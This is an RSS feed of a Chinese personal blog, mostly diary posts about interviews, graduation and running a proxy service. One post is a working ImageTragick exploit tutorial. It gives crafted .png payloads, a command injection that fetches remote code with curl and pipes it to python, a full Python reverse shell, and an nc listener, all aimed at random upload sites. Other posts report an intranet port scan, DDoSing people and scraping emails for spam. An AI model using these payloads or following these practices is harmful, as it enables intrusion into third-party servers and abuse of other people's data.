短期内的目标是完成工作任务，除了工作的目标，继续完成我的“分裂式”爬虫？然后搞一个关系网出来。
数据很有趣，系统很有趣，创造很有趣。我未来的女朋友也很有趣。</description>
    </item>
    
    <item>
      <title>面试有感</title>
      <link>https://wrfly.kfd.me/posts/%E9%9D%A2%E8%AF%95%E6%9C%89%E6%84%9F/</link>
      <pubDate>Wed, 16 Aug 2017 00:00:00 +0000</pubDate>
      
      <guid>https://wrfly.kfd.me/posts/%E9%9D%A2%E8%AF%95%E6%9C%89%E6%84%9F/</guid>
      <description>这两天面试了两家公司。
周一是头条。赶了一小时的路，等了二十分钟面试官。一面的时候，说了一下我的简历，我做的项目，考了一个小程序，虽然也不能work，但勉强通过吧。二面问了全排序，然后g掉了。中途还在他们食堂混了顿饭，其实也没吃饱。写代码的中途去了两次厕所，有点尴尬。
的确是一家技术氛围很强的公司，人员也很专业，前台，面试会议室，食堂，都很不错。唯一可惜的就是我水平不行，连个递归都手写不出来。
周二是知乎，安全岗。同样是一个小时路程，但是在那边等了半小时HR，上楼之后感觉又随便拉了个人来面试，然后等他五分钟联网。然后自我介绍那一套。可能那个小哥面试经验不足，也可能是人家太忙吧。感觉自己回答的都不好。应该也是g掉了。
唉唉唉，给老大丢脸了。
情况就是这么个情况。今天没有收到摩拜的面试通知，明天去故宫登一波基。
其实我很好奇，为什么面试官都不会事先看一下简历，问了一下知乎的小哥，也没有很清晰的回答我，大概的意思是，他们很忙，时间成本。
但招人本来就是要成本的呀。
白白浪费掉简历上的链接。哦对，知乎连纸质版的简历都没准备，看来是真的忙。
难以想象怎样才能在很短的时间展示自己，也不明白怎样在这么短的时间内了解一个人。面试也是门技术活。
人嘛，都是有长有短，咳咳，我是说，长处短处。
不善言谈的人，或者不善表达自己的人，比如我？就感觉很吃亏了，相比那些能够很好的表达自己的人，其实这也是能力的欠缺。唉唉唉。
我原本想着，我这github更新的频率，blog上的有的没的，简历上的项目和实习/工作经历，应该能打动一部分人吧。还是高估自己了。
也难怪，毕竟没有这么正式的面试过。太过自信，以致自负。
真的有点水了我。
但话又说回来，不能妄自尊大，也不能妄自菲薄呀。
找工作哪有那么容易嘛。
实习的面试可能是allen想给我个机会；工作的面试可能是跟老大聊得来，他看我可以栽培。
但真正这样正式的面试，我还是第一次。之前也没人考过我算法和数据结构呀。怪自己不行。如果能够好好的review一下自己写的，说不定哈，就可以通过头条了。但我也好像没有很惋惜的样子，感觉还是有点不合适。我是很喜欢解决问题，但我好像没有能力用那些算法什么的解决。
至于安全方面，虽然说是科班出身，但学到的东西寥寥无几，人家考你sqlmap的源码，我是真心没看过。也就凭兴趣搞站，遇到问题了，搜一下。如果是izy或者lcy的话，他们应该很容易就过了吧。
找到一个合适的工作不容易。感觉每个人都是带有一定的自身属性的，放在这里就OK，放在那里就不行。
也是需要锻炼学习一下怎样表达自己，面试官，绝大多数面试官，都可能是临时拉来的，你要让他相信你的能力，或者说了解你的能力，并非易事啊。
要说自己会干什么，还得看你让我干什么。不会的东西，一周，也就学的差不多了。
面试是一场硬仗，面试的东西很可能在工作中都用不到，因为大家都是面试很基础的，而这些东西，都有现成的代码可以抄，有点悖论的样子。
所以说啊，如果你也跟我一样要找工作，还是看一下，搜一下前人的面试经历，看一下这家公司的风格，投简历的时候也要慎重，到底符不符合人家的要求。
再有吐槽的一点就是，你写了github啊，blog啊，他们也就瞄一眼。瞄～
全凭一张嘴。还有手写代码的能力。
其实我也很赞同这个手写代码的能力，上面能看出很多问题，但是的话，就算用IDE，也不会一下就跑通，所以这个很考验人。给头条点赞。
总结一下。
简历上的github最好加点数字，比如多少个repo，多少次commit，多少行代码。blog里面写了多少文章，从什么时候开始的。感觉这些具体的数字更好衡量一点，不然的话，面试官很可能就一语带过：“哦，还有博客是吧。”不要指望面试官会去看上面写了什么东西。因为他们可能连简历都没打印（逃&amp;hellip;
面试之前问一下同学或者师兄，看面试官都喜欢问什么，有针对性的弥补一下，因为这些套路都是不变的。有点应试教育的感觉了。
但不管怎么说，自身实力是最重要的。
当然也不能因为几家公司的面试失败就断然否定自己，尺有所短，寸有所长？
心态放平，不着急。</description>
    </item>
    
    <item>
      <title>匆匆</title>
      <link>https://wrfly.kfd.me/posts/%E5%8C%86%E5%8C%86/</link>
      <pubDate>Wed, 24 May 2017 00:00:00 +0000</pubDate>
      
      <guid>https://wrfly.kfd.me/posts/%E5%8C%86%E5%8C%86/</guid>
      <description>时间 忘记在哪里看到的了，说，不同的年龄对时间的感知程度是不一样的，小孩子觉得一天很漫长很漫长，起床，穿衣服，吃饭，上厕所，上学，上课，下课，课间操&amp;hellip;一天简直太长了，晚上回去还要吃饭，写作业，看电视，天天盼着什么时候才能长大。但是到了老年，每天就起床，吃饭，睡觉，一天啥都没干就已经结束了，总想盼着时间过得慢一点。
之前一直不能理解这些话，但临近毕业，我越发感受到，时间，真的过得太快了。
四年的时间，感觉剧情都没有一部电影长。但总归是经历了那么多东西。罗列的话，军训，上课，考试，放假，开学，爬山，聚餐，火锅，唱歌，熬夜，日站，看书，动漫，追剧，失恋，认识新的人，实习，晒太阳，漫无目的的散步，写代码，做项目，搞网站，写博客，林林总总，乱七八糟的。
我甚至还记得当时选大学选专业的那些日子。甚至还记得熬夜去走廊写高数作业，然后碰到一个莫名的人来巡视；熬夜日站，想尽各种方法手段去搞别人；熬夜写代码赶需求，快速迭代，敏捷开发？；不吃不喝打比赛，虽然根本没什么名次，但的确接触到不少新东西。历历在目却又如白驹过隙。
大一的时候在墙上贴的那些励志的话也都悉数褪尽颜色，还有那些罗列的书单，笑哈哈，就看了两本。
 想想你在做什么，你该做什么，你要做什么。
你永远不知道未来的你有多强大。
不要碌碌无为，不要劳而无获，不要虚度光阴。
专注一件事，做到底。
 还有最最重要的一条：
 永远记得备份数据！
 可怜的，宝贵的，该死的时间。
规划 今天去帮同学做攻击测试，然后被问到如何确定自己的方向。233，我上个月选择offer的时候还问过别人，现在就要以 elder 的身份去给别人解惑了。
忽然想起新华字典里有这样一个例句：“张华考上了北京大学；李萍进了中等技术学校；我在百货公司当售货员：我们都有光明的前途。”
换到大学毕业，那就是：“张华考上了研究生；李萍去了创业公司写代码；我在某个公司干销售：我们都还活着。”
感觉，这不是我们的计划啊，我们的目标不是星辰大海吗。
屁，房子都买不起，星什么辰，大什么海。
人啊，活着最重要，至于开心的话，排第二位吧就。
初步总结了一下程序员的发展之路：应届生→初级程序员→中级程序员→高级程序员→初级架构师→中级架构师→高级架构师→CTO→买房。
中间任何环节都可能分叉，转行去做销售什么的，或者回家开饭店。其实我倒是挺想开饭店的，人总归是要吃饭的嘛，如果将来AI取代了某些程序员的位置，那我就还能有点家产。其实在学校开店也可以，手机贴膜啊，复印店啊，旧书店啊什么的。但是日子又太无聊了。唉。人活着，或多或少，都是有些苦恼的。比如，晚上吃啥。
有件事情我一直在权衡，兴趣和工作是绑定到一起的吗。可以把兴趣发展成工作，还是说，可以把工作演变成兴趣？但兴趣是真的好玩，工作的话，就不一定了。二者之间，要说想通的地方，成就感？兴趣可以使我愉悦，工作可以使我获得薪水，都可以从二者中获得成就感，当然，如果有成就的话。
所以啊，对于我来说，信息安全是个兴趣，但不一定要发展成工作，不然有可能我会丢失我的愉悦；但工作一定不能是枯燥无味和重复的，否则我就没有成就感。我未必会从兴趣中获得报酬或者薪水，但从工作中，一定不能不开心。（对没错，这就是离职的理由之一。）我的工作可以是开发，可以是运维，可以是救火队员，但我一定要把这些事情玩出花儿，不能日复一日的熬，一天一天的撞钟。真的，太无聊，那样。但是有一种人就特别厉害，兴趣和工作完美的结合到了一起，干活就跟玩儿一样，爽歪歪，太羡慕。
但有些人就不一样啊，他们喜欢安逸和稳定和不出问题，每天虽然做着重复的事情，但下班后的悠闲就会弥补这些不愉快。所以这些人生也不能说是没意思。
某种意义上讲，我还挺奇葩的，我喜欢出现问题，然后解决问题，但又不喜欢同样的问题，because this makes me angry. 也不会说别人爱听的话，lonely.
再回到解惑上去。
那天我问别人的时候，总结了两点就是，专注和沉淀。L说的是沉淀，Z说的是专注。其实意思都差不多，就是别水，要有干货。专注是沉淀的充分条件，沉淀是专注的必要条件。
虽然都是二十出头的小伙子，但说的还都很有道理的，比我这个迷茫要强得多。
记得大一的时候，学长说过要选择自己的方向，可能那个时候他也刚找到自己的方向吧，毕竟找方向挺难的，这么多东西，又没有指南针，找方向谈何容易。
所以那些没有方向的人，就只能找个热门的行业和岗位，进个培训班，学上几个月，然后面试碰碰运气，混口饭吃。我可不想这样。
人呐，要知道自己要干什么。
大学中多涉猎一点，是好事。因为只有这样了，你才能知道到底有哪些方向供你选择，某种意义上的路线矫正？也有可能就是，当你找到某个方向的时候，发现另一个方向自己也喜欢得不得了，然后就跳到那个行业去了。嗯&amp;hellip;虽然听起来像狗熊掰棒子，但是大家都是成年人了，是要对自己的行为负责的，所以，慎重考虑之后的决定，并不是见异思迁。
至于找工作，就要看你会什么了。写代码的不能去搞设计，做美工的不能来干运维。虽然说不想当厨子的裁缝不是好司机，但不会写代码的程序员是做不了CTO的（认真脸）。 最好的方式是，通过大学四年的积累，找到了自己的方向，然后小小的努力一下，学有小成，然后有些顺利的拿到offer，开始打工之路。最差的方式是，打了四年游戏，啥也不会，毕业证差点混不出来，毕业前慌忙啃了三个月Java，坎坷入职某公司。
虽然大家都找到了工作，但经历不一样呀。哦对忘了说，经历是人生宝贵的财富。
唉，我都不知道自己说了什么。大家好，我叫瞎哔哔。</description>
    </item>
    
    <item>
      <title>校内网安全测试</title>
      <link>https://wrfly.kfd.me/posts/%E6%A0%A1%E5%86%85%E7%BD%91%E5%AE%89%E5%85%A8%E6%B5%8B%E8%AF%95/</link>
      <pubDate>Tue, 18 Apr 2017 00:00:00 +0000</pubDate>
      
      <guid>https://wrfly.kfd.me/posts/%E6%A0%A1%E5%86%85%E7%BD%91%E5%AE%89%E5%85%A8%E6%B5%8B%E8%AF%95/</guid>
      <description>今天测试了一下学校的内网主机，傻逼学校没做VLAN，光在 10.170.0.0/16 就扫到了 1662 台开着 445 端口的主机:
➜ ./fmt.sh | wc -l 1662 ➜ ./fmt.sh | grep &amp;#34;Windows 7&amp;#34; | wc -l 451 ➜ ./fmt.sh | grep &amp;#34;Windows 8&amp;#34; | wc -l 378 ➜ ./fmt.sh | grep &amp;#34;Windows 10&amp;#34; | wc -l 788 ➜ ./fmt.sh | grep &amp;#34;Windows XP&amp;#34; | wc -l 40 ➜ ./fmt.sh | grep &amp;#34;Windows 2008&amp;#34; | wc -l 3 ➜ ./fmt.sh | grep &amp;#34;Windows 2008&amp;#34; [*] 10.</description>
    </item>
    
    <item>
      <title>Linux下Gates病毒</title>
      <link>https://wrfly.kfd.me/posts/linux%E4%B8%8Bgates%E7%97%85%E6%AF%92/</link>
      <pubDate>Wed, 22 Mar 2017 00:00:00 +0000</pubDate>
      
      <guid>https://wrfly.kfd.me/posts/linux%E4%B8%8Bgates%E7%97%85%E6%AF%92/</guid>
      <description>今天处理了一个Gates病毒。 病毒表面症状是，创建一个带有 ais 隐藏属性的 /etc/kblockd 文件，无法删除，并且在 /usr/bin/dpkgd/ 目录中创建了lsof netstat ss ps这些二进制文件，在 /tmp 目录下生成 gates.lod 和 moni.lod 两个文件，在 /etc/init.d/ 中创建 selinux 和 DbSecuritySpt ，并向 /etc/rc.d/rc*/ 中注册，其中，/etc/init.d/selinux 启动的是 /usr/bin/bsd-port/getty，还会创建一个隐藏的 /usr/bin/.sshd 文件作为后门。
看上去很复杂的样子。
解决脚本如下：
#!/bin/bash chattr -ais /etc/kblockd #cp /dev/null /etc/kblockd #chmod -x /etc/kblockd rm -f /etc/kblockd pkill .sshd chmod -x /usr/bin/.sshd rm -f /usr/bin/.sshd pkill ^getty rm -rf /usr/bin/bsd-port rm -rf /usr/bin/dpkgd find /etc/rc.d/ -name *selinux -delete find /etc/init.d -name *selinux -delete find /etc/rc.</description>
    </item>
    
    <item>
      <title>关于随机</title>
      <link>https://wrfly.kfd.me/posts/%E5%85%B3%E4%BA%8E%E9%9A%8F%E6%9C%BA/</link>
      <pubDate>Sun, 05 Mar 2017 00:00:00 +0000</pubDate>
      
      <guid>https://wrfly.kfd.me/posts/%E5%85%B3%E4%BA%8E%E9%9A%8F%E6%9C%BA/</guid>
      <description>我们知道电脑生成的数字是伪随机的，掷骰子是随机的。那为什么电脑生成不出一个准确的随机数呢？为什么掷骰子就是随机的呢？
电脑生成的random number，是以time作为seed，然后生成一个数字，那么，如果我们在电脑计算完成这个数字之前，准确的知道了这个seed，知道电脑生成数字的这个函数，那么我们就知道电脑即将生成的数字。这很容易理解。
但是。
为什么我们都相信，掷骰子就是随机的呢？
我们怎样来定义这个随机呢。
Quota wikipedia:
 随机性（英语：Randomness）这个词是用来表达目的、动机、规则或一些非科学用法的可预测性的缺失。 一个随机的过程是一个不定因子不断产生的重复过程，但它可能遵循某个概率分布。 术语随机经常用于统计学中，表示一些定义清晰的、彻底的统计学属性，例如缺失偏差或者相关。随机与任意不同，因为“一个变量是随机的”表示这个变量遵循概率分布。而任意在另一方面又暗示了变量没有遵循可限定概率分布。
 我的理解是，如果一个事件遵循概率分布，每种事件的可能性都相同，那他则是随机的；如果事件不可预测，不遵循概率分布，那就是任意的。
所以，掷骰子这件事，真的是随机的吗？
如果我们在掷骰子的时候准确的知道了投掷的方向，角度，初始投掷面，是不是就可以计算出最终的结果？那这是随机的吗？
如果一个事件有十个过程，其中一个过程是随机的，另外九个过程是不随机的，那产生的事件结果是随机的吗？不随机的话，就是确定的吗？
投掷一枚硬币，可能会出现正、反、立三种情况，那这三种情况的概率必然不是一样的，那么为什么我们认为正反是随机的呢？
如果说是因为投掷时候的角度，初始面，以及投掷力度的不同所产生了一个随机的面，那么只有确保投掷时候各个因素都必须是随机的，才能保证最终产生的结果是随机的，然而这些因素能够保证都是随机的吗？只要有一个条件不随机，那么最终产生的结果就不是随机的，可以这样理解吗？
再回到抛硬币这件事，如果硬币正反面相同，并且有办法标记，在真空环境下，用相同的力度，角度抛出，那么产生是不是就能确定了呢？再放宽一下条件，硬币正反面不想同，仅有细微差别，在正常环境下，用不同的角度，不同的力度抛出硬币，最终产生的结果是真的随机吗？可不可以理解为，函数的输入是力度和角度，输入是硬币哪个面朝上呢。但是如果我们能够计算出这个力度和角度，是不是就能准确的知道哪个面朝上，是不是可以说，这不是随机的，也不是任意的，而是可预知的？
那么世界上有什么是随机的呢？是不是全都是伪随机？今天下楼的时候刚好碰见一个同学，这是真的“刚好”吗？真的是随机遇见的吗？会不会是可以预测呢？而你没有办法预测，只是因为你掌握的资源不够？
那么，未来是随机的吗？是不是在一系列伪随机下的必然？
最后推荐两个小视频：
什么是随机的
什么不是随机的</description>
    </item>
    
    <item>
      <title>20170203</title>
      <link>https://wrfly.kfd.me/posts/20170203/</link>
      <pubDate>Fri, 03 Feb 2017 00:00:00 +0000</pubDate>
      
      <guid>https://wrfly.kfd.me/posts/20170203/</guid>
      <description>已经好久没有更新博客了，找的借口是工作繁忙和懒。
半年的实习也已经结束一周了，光阴似箭，这句话很有道理。
这半年总结起来，有写脚本的活，有写Python开发的活，有写go打补丁的活，还有用go写监控的活。原来DevOps就是因为缺人才产生的一种职业啊，naive了我又。数据库高可用方案也搞了好久，写了一点东西，全放公司wiki上了，希望对别人有用。接手的项目有几个，创造性的东西也有几个，大多数是自己的歪点子，不过效果还不错。
Docker啊Docker。我离安全的路是越走越远了。
中间还玩了两个docker提权，也算是给公司提醒了，不过那篇文章终究没有写出来。
不过也托了docker的福，我的毕设也跟docker相关，代码也多多少少写了一点了，用的是新学的golang。
半年回了三次学校，一次答辩，一次考试，一次补考。
半年玩了两次，一次西安，一次南京。
人啊，是越来越懒了，感觉没有以前那么有干劲儿了。
每每想到未来的种种，就有点压得我喘不过气，不过，没用。还不如老老实实写代码。
可是我不甘心做个码农呀。
可是我还能做点什么。
我也不知道自己几斤几两。其实我连四层代理，七层代理是啥都不知道。我只知道有个四层，有个七层，而且还没用到。
我会一点php，会一点python，会一点golang，还会写点shell，centos和ubuntu都会玩，也管理过自己的十台机器，还有公司的几百台机器（其实没啥好管的，无非就是清理磁盘，重启机器，修修文件系统，重装一下docker，再多的，管理一下scaleio？）。有时候都觉得自己low的不行。可是我又觉得自己跟别人不一样。到底哪里不一样呢，我还说不清楚。这就比较尴尬了。
为什么晚上比白天更有效率？ 因为晚上的时候对白天的碌碌无为感到愧疚。
比deadline更有力量的是内心的愧疚。
给毕设起名字也没起好，想做一个靶场，基于docker的，docker里面放漏洞应用。想了半天，竟然叫fc。不知道会不会有人联想起fc2，或者是fuck之类的词儿。
选择困难。
代码写了一半，制作那些漏洞应用又得好半天，更别说那些书面工作了。好烦。
我还有十个小时的视频要录制，真的，我哪里来的勇气浪费时间啊。
都说博客是分享技术的，我tm却在这里瞎扯淡。希望以后的自己看了现在的自己写的乱七八糟的东西，不会笑话自己。
就这。</description>
    </item>
    
    <item>
      <title>校园V6</title>
      <link>https://wrfly.kfd.me/posts/%E6%A0%A1%E5%9B%ADv6/</link>
      <pubDate>Sat, 12 Nov 2016 00:00:00 +0000</pubDate>
      
      <guid>https://wrfly.kfd.me/posts/%E6%A0%A1%E5%9B%ADv6/</guid>
      <description>31-aug-2015，我注册了 xyv6.com 这个域名。我还记得那个中午。
起因是校园网流量太少，但是学校又不限制IPv6的流量（不知道是政策上还是技术手段上），所以就萌生了用IPv6代理上网的想法。
其实这个想法的萌芽是用GAE翻墙，然后联想到GAE的IPV6，又联想到shadowsocks，再联想到IPv6服务器。
恰好那个时候有Github送的学生福利，买了几台DigitalOcean的机器，搭了代理。
网站是用的现成的ss-panel,当时的界面还没有现在3.0版本好看，几乎所有的售卖ss代理都是这一套。
后端用的是ss-multi-user版本，好像是叫这个名字，已经记不清了。
当时就算过一笔账，一台服务器可以开1000个人用，就算只有100个VIP，一个人收他10块钱，也是1000块，1000块能买7,8台机器，利滚利。而且有的机器按年买的话非常便宜。况且当时还有DigitalOcean的100刀优惠券，无本万利的感觉。（可是到最后也没有超过80个VIP用户&amp;hellip;）
沸沸扬扬的开张了。
当时还在情人坑思考过怎么支付，先是用的淘宝开店，让用户拍下之后联系旺旺，大约卖了几单吧，太麻烦了，不过还是很开心的。虽然是几十块钱，但对我这种穷屌丝来说就是几个月的话费啊！
后来觉得页面难看，就改了配色，显得不是那么难看。
还从网上找了一个logo。哈哈哈哈。
当时推广是在校内bbs推广的，效果还算可以，不过就是有些小白啥也不懂，很无语。
9-17的时候，注册用户过了600。
10-19的时候，注册用户有1978个。
当时还增加了一些小功能，比如离线下载。用户提交一个URL，每台节点的后台都有个job去拿这个下载任务，然后利用服务器的高带宽去下载，大概迅雷也是这个套路？或者他们有更牛逼的资源吧。
还增加了支付宝支付的接口。当时这个接口我可是研究了好几天，一点也不会PHP，因为穷，硬是做出了扫码支付。想想自己当时也是蛮牛逼的，忘记吃饭，忘记睡觉，每天都是加feature，1点之前没有睡过觉。还好当时校园网不断，要是断电断网，那我就gg了。
每次上线一个功能，都要测试好久，改来改去的，毕竟不会PHP，当时也没系统的学习Python。好在这两门语言都很好上手，容易看懂，而且，不难。
上线的流程是，本地测试OK了，就上传代码到远程服务器。主服务器为了稳定，都是买的高配置的，当然，也是便宜的。一开始在conoha，妈蛋把我封了，然后是z.com。（又封了）
发邮件的时候，为了不显得那么low，我还自己设计了邮件页面，设计了slogan，还有主页的版面。
有天我发现这个logo太平凡，好像是个国外很牛逼的视频播放网站的logo？然后当时谷歌也换新logo了，正好，这个配色很漂亮，抄了一下，就变成校园V6的logo：
后来用户越来越多，破5000，破8000，到上个月的破1w，倒闭前的1w1。
看起来都是数字。没有一开始那么激动了已经。
寒假前想着在寒假里重新设计一下主页，但由于不想学习，寒假之前就把这一套弄完了，包括kf5的客服系统。
对了，还被封过域名，把我 www.xyv6.com 封了之后，我就把主域名改成xyv6.com，好记，而且短。有时候，短未必是一件坏事哈。
一开始调教支付宝接口的时候，各种让舍友付款，各种退款。都熄灯了还在弄这个，也是蛮有意思的。
还曾经利用香港服务器搞过CDN，因为主站访问特别慢，就想自己做CDN加速一下，可是遇到了一些问题，比如莫名其妙登进了别人的账户，也是不容易。
剩下的日子就比较清闲了，代码基本都搞完了，也没有啥开发任务，就是维护服务器，什么定时重启服务啊之类的，曾经想优化一下python代码，然而并没有成功。
有些时候就是想起某个功能，就动手写。还有的时候是用户提出需求，然后我写。开发效率也是快，凌晨就能上线。
不能说我比别人做的好吧，但至少，更人性化了。
最后名声在外，是因为做了一个邀请的功能，真的很管用～
对了，还有群发邮件，那次好像是有5000+的用户，然后我就群发邮件通知什么的。还有推广邮件，从学校的库子里扒拉了几千个邮箱，然后群发邮件，sendgrid真的太赞了～
还增加了实时显示节点网速的功能，增加了一些监控，然而并没有去看监控&amp;hellip;
好多事情都是拍脑袋想出来的，做出来了，就不再管了。就好像，github上开的那么多repo。
每天支付宝上能有十块二十快的进账，一个月的收入也有几百块，能支付那些服务器的费用。总的来说，我也没赔。
还有一件最重要的事，就是前期推广的时候我还印发了一千张广告，其实一千张也没有多少。有个大二的兄弟（当然，我也不认识人家），帮我发了一中午。省下的广告还在校园内到处贴，妈蛋还被一个保安拍照了，说不能贴广告，日狗。
回首往事啊，好像也没有很多感慨。就是觉得怪可惜的。把鸡蛋放到一个篮子里，篮子摔了，鸡蛋也都碎了。
现在也没动力去搞了，没有新的功能，没有维护，QQ群也是几天看一次，还那么多发广告的。QQ群的人数一直没破300，微博的粉丝也到了321止步。真的结束了。
不过我很开心能做出这样一件事情，让自己没有碌碌无为，能赚些小钱充充话费，给女朋友买点东西。还学到了不少运维的经验。还用这些服务器D过别人hhhh
自己的付出，得到了别人的感谢，真的是一件，非常非常非常快乐的事。
向自由致敬。
校园V6也许不会再开放了，因为我不确定还有没有这样的时间去做，我也不能说我失败了，只能说自己没有用心，或者懒惰。备份的数据放在同一台机器上，我也不知道自己是咋想的hhh。
虽然积累的一些脚本没了，不过经验还在。我还在。
再也不会有人注册了。
忽然想开放源码了。
好。就这么做了。
 以后数据库要异地容灾。 卖ss没有你想象中那么赚钱。 有好用户，也有坏用户。但大多都是好的。 防止薅羊毛。 得到别人的认可是很重要的。 成就感源自于*你*的成就。 很多事情没有你想象中那么难，着手去做就好了。 行动力是第一要素。  平台构架  主节点： &amp;ndash; Mysql（存储用户数据） &amp;ndash; Nginx（Web服务） &amp;ndash; Shadowsocks（运行服务，更新用户数据，更新用户套餐） &amp;ndash; Cron定时任务（月底清空免费用户流量数据，每小时备份，每天压缩备份数据[待添加：发送备份sql文件到邮箱]，定时重启ss服务）</description>
    </item>
    
    <item>
      <title>一点小工作</title>
      <link>https://wrfly.kfd.me/posts/%E4%B8%80%E7%82%B9%E5%B0%8F%E5%B7%A5%E4%BD%9C/</link>
      <pubDate>Wed, 06 Jul 2016 00:00:00 +0000</pubDate>
      
      <guid>https://wrfly.kfd.me/posts/%E4%B8%80%E7%82%B9%E5%B0%8F%E5%B7%A5%E4%BD%9C/</guid>
      <description>前一段日子反代的谷歌被墙了，所以，不得不换个新的域名，而且这个域名还不能直接被打开（被确认为谷歌），所以，就耍了一点小聪明：
valid_referers kfd.me *.kfd.me server_names ~\.google\. ~\.baidu\.; if ($invalid_referer) { rewrite ^/ http://kfd.me; } 算是做了一点小小的工作，而且还挺管用的。可惜了以前每天几千UV的日子，现在只有几十了。
首先定义了一些Refer，然后服务其判断如果来源不是这些的话，就会返回到我的主站，不知道gov的那些爬虫会不会继续搞我，就先这样吧。
还有一些小东西：
sort -u -t &amp;#39;,&amp;#39; -k2,2 data 这条关于sort的命令，用来以文件的第二个字段（字段之间用‘，’分隔）排序并去重。超级好用！
之所以会用到这条命令，是我这几天在搞一些用户名密码相关的事情，以后的日子还算清闲，没有别的事情，就研究用户名和密码了。
还有一个小脚本，争取明天写个框架，是一个Telegram的机器人，放到VPS上，当监控来用。
偷懒了好久，该活动活动了。</description>
    </item>
    
    <item>
      <title>DaoCloud API CLI Tool</title>
      <link>https://wrfly.kfd.me/posts/daocloud-api-cli-tool/</link>
      <pubDate>Sat, 21 May 2016 00:00:00 +0000</pubDate>
      
      <guid>https://wrfly.kfd.me/posts/daocloud-api-cli-tool/</guid>
      <description>这段时间利用 DaoCloud API 写了一个CLI的工具。
https://github.com/wrfly/docker/tree/master/daocloud_api
代码在上面。
拖了好久才写完，好累。。
用shell写东西就是比较麻烦，不如Python好用。
题外话：
完成一件作品当然是很开心的，不过考虑到我是否能够顺利毕业，心情突然就不美丽了。
没看书，没学Python，没学车，没练字，没跑步。
也不知道我的时间都去哪儿了，好像每天过得恍恍惚惚的。
好像看不到未来，是因为束缚太多吗？有时候我会想，如果毕不了业会怎样，拿不到学位证，大学四年就算白念了吗？可是让我学一些根本不感兴趣的东西，做一些完全无聊的工作，整个人都好难受。我也只能拿这些理由来敷衍自己，自欺欺人？算不算？
不知道怎样解决这些问题，连个倾诉的人都没有。
谁会站在你的立场为你着想呢？他们连自己都顾不过来，何谈关心别人。
纠结，优柔寡断，这是我最大的缺点。
哦对了，还有拖延。
搪塞自己，说大不了不毕业，可是谁不想毕业呢，不毕业找不到工作怎么办，连自己都养活不了啊。可是强要我做哪些不喜欢的事情，还不如让我去养猪。写个毛的嗅探器，分析个毛的二进制代码，我连汇编都不会的好吗。我只想搭积木，积木用什么做的我根本不关心也不想去关心。
人跟人也不能比。但我也不承认我比他们差啊。
是不是每个人都活的这么累。
我想知道未来的我有多强大。
Dark time, and lazy day.</description>
    </item>
    
    <item>
      <title>ImageMagick漏洞利用</title>
      <link>https://wrfly.kfd.me/posts/imagemagick%E6%BC%8F%E6%B4%9E%E5%88%A9%E7%94%A8/</link>
      <pubDate>Sat, 07 May 2016 00:00:00 +0000</pubDate>
      
      <guid>https://wrfly.kfd.me/posts/imagemagick%E6%BC%8F%E6%B4%9E%E5%88%A9%E7%94%A8/</guid>
      <description>写在最前面：关于漏洞的详细信息都在这儿： https://imagetragick.com/ 加个https我估计也是为了嘲讽，醉。
话说我反应好慢。
刚测试成功了就尴尬了一回。
然后琢磨怎么getshell。
然后。
如下：
测试服务器是否存在漏洞： 创建一个文件，叫他 e.png 吧：
➜ cat e.png push graphic-context viewbox 0 0 640 480 fill &amp;#39;url(http://23.23.23.23:8000/)&amp;#39; pop graphic-context 其中23.23.23.23是你的服务器IP，然后在上面开一个迷你的web服务器：python -m SimpleHTTPServer，默认端口就是8000，如果有其他业务在8000端口跑。还请加个端口参数（python -m SimpleHTTPServer 8989），记得上面的e.png也改一下。
在服务器上监听好了之后，就可以上传图片了，哦对了，首先做的应该是找一些能上传图片的站，比如，在线图片转换（Google Hacking）。
其实可以在本地先测试一下：convert e.png o.jpg，如果服务器那边有访问请求（GET），那就说明你本地是存在漏洞的。
然后如果你找到了一个可以上传图片并且可以执行代码的网站，那么恭喜你，下一步就可以测试getshell了。
Getshell 利用执行命令这一点，可以做很多事，创建文件，删除文件，移动文件，乱七八糟，我只是利用了一个shell而已。
➜ cat psh.png push graphic-context viewbox 0 0 640 480 fill &amp;#39;url(https://1&amp;#34;||curl -sS http://23.23.23.23:8000/e.py | python&amp;#34;)&amp;#39; pop graphic-context http://23.23.23.23:8000/e.py：
import os,socket,pty;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((&amp;#34;24.24.24.24&amp;#34;,2333));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);os.unsetenv(&amp;#34;HISTFILE&amp;#34;);os.unsetenv(&amp;#34;HISTFILESIZE&amp;#34;);os.unsetenv(&amp;#34;HISTSIZE&amp;#34;);os.unsetenv(&amp;#34;HISTORY&amp;#34;);os.unsetenv(&amp;#34;HISTSAVE&amp;#34;);os.unsetenv(&amp;#34;HISTZONE&amp;#34;);os.unsetenv(&amp;#34;HISTLOG&amp;#34;);os.unsetenv(&amp;#34;HISTCMD&amp;#34;);os.putenv(&amp;#34;HISTFILE&amp;#34;,&amp;#34;/dev/null&amp;#34;);os.putenv(&amp;#34;HISTSIZE&amp;#34;,&amp;#34;0&amp;#34;);os.putenv(&amp;#34;HISTFILESIZE&amp;#34;,&amp;#34;0&amp;#34;);pty.spawn(&amp;#34;/bin/sh&amp;#34;);s.close() 然后要在 24.24.24.24 的 2333 端口监听反弹过来的shell：nc -lp 2333
把这个图片文件上传，然后在 23.</description>
    </item>
    
    <item>
      <title>20160329</title>
      <link>https://wrfly.kfd.me/posts/20160329/</link>
      <pubDate>Tue, 29 Mar 2016 00:00:00 +0000</pubDate>
      
      <guid>https://wrfly.kfd.me/posts/20160329/</guid>
      <description>好久没更新博客，好像整个人都很忙的样子，实际上是碌碌无为了。
这几个月经历了很多事情，比如又分手啊，学Python啊，出去浪啊，投简历啊，面试啊，请假不成功啊，拿offer啊，校歌赛啊，还有认识了一个有趣的姑娘啊，硬盘数据全丢啊（备份盘，检查坏道的时候多加了一个参数，日），还有喝酒啊，呕吐啊，敲代码啊，学车啊，之前还有一些补考啊，作弊啊，撸串啊，乱七八糟的。
每个词都是一个故事。
反正没有好好学习。
不学习就会落后，落后就要挨打。
以前还说过要写日记什么的，不过现在看来也就是想想了，因为没时间写日记啊。不过要是问我时间都去哪儿了，我会说，无可奉告。因为我tm也不知道我的时间都去哪儿了。感觉一天天都浑浑噩噩的，好像做了好多事情可是又好像什么事都没做。
列了一大堆任务，可脑子里还是乱乱的，可恶的拖延症啊。
副本太多，打不过来了。
想想我要做什么呢？
今晚上先把VIM的翻译搞定，真的不能再拖了。
然后我对hack的兴趣并不是那么大了，因为要学的东西还有那么多，日站这种事情还是得放到闲暇时刻去做。
关于看书呢，kindle里面已经有好多看不完的书了，打发时间是好的，不能指望学到太多东西。
